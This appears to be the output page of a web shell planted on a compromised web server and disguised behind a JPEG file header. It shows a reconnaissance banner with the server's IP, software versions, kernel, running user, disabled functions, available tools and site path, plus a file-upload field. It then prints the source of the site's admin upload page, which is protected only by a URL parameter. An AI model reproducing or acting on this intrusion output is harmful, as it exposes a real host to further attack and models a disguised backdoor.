????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.25 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/fi2/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
<title>Upload Fi2 Value and Class Lists</title>
<style type="text/css">
.text {
font-family: Verdana, Geneva, sans-serif;
font-size: 18px;
font-weight: bold;
}
</style>
<script>
function edit(){
if(document.getElementById("clientid").value != ""){
document.location.href = "edit.php?page=fi2admin&customerid="+document.getElementById("clientid").value;
}else{
alert("Add a clientID!");
}
}
</script>
</head>
<body><?php if($_GET['page'] == "fi2admin"){?>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="text"><p>Upload Fi2 Value and Class Lists</p>
<form id="form1" name="form1" method="post" action="upload.php" enctype="multipart/form-data">
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>Client ID:</td>
<td>
<input type="text" name="clientid" id="clientid" />
<input type="button" name="button2" id="button2" value="EDIT" onclick="edit();"/></td>
<td> </td>
</tr>
<tr>
<td>Type:</td>
<td>
<select name="type" id="type">
<option value="valuelists">Value List</option>
<option value="classlists">Class List</option>
</select></td>
<td> </td>
</tr>
<tr>
<td>XML-file:</td>
<td>
<input type="file" name="fileToUpload" id="fileToUpload" /></td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="button" id="button" value="Submit" /></td>
<td> </td>
</tr>
</table>
</form>
<p> </p></td>
</tr>
</table>
<?php }?>
</body>
</html>